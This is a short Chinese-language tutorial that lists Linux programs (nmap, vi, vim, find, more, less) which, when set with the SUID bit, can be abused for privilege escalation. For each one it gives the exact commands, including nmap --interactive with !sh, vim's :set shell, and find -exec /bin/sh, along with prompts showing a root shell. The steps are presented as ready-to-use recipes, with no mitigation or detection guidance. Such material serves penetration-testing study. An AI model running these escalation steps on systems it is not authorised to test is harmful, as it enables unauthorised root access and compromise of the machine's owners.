在Linux中有几个文件,一旦具备suid权限位,将可以被用来进行提权,分别是:Nmap Vi Vim find More Less
一、nmap
nmap在2.02-5.21之间的版本存在一个交互模式,这个模式允许用户执行shell命令,具体操作方式如下
1、首先进入交互模式
msfadmin@metasploitable:$nmap --interactive
nmap>
2、通过交互模式进入shell:输入!sh
nmap>!sh sh-3.2#
二、Vi
1、启动Vi在命令模式输入以下内容
:!sh
sh-3.2#
这样可以直接进入root权限的shell模式
三、Vim
1、启动Vim在命令模式下输入以下内容
:set shell=/bin/sh :shell
这样就可以直接进入root权限的shell模式
四、find
find命令有一个-exec参数,这个参数用于:“当找到对应的文件后,执行一个系统命令进行处理该文件”,可以被用来进行提权
test@test:$touch test #确保可以找到该文件 test@test:$find test -exec "/bin/sh" \; root@test:#
五、more/less
more和less可以被用来进行提权的一个重要因素在于可以从这两个命令里进入vim/vi模式
1、先通过more打开一个文件
test@test:$more testfile
2、这个时候可以按一下键盘上的 ‘v’,便可以调用Vim/Vi进入编辑模式,这个时候就可以通过vim进行提权,全程都是root权限:命令模式下输入“!sh”就可以获取一个root的shell。参考第二、三条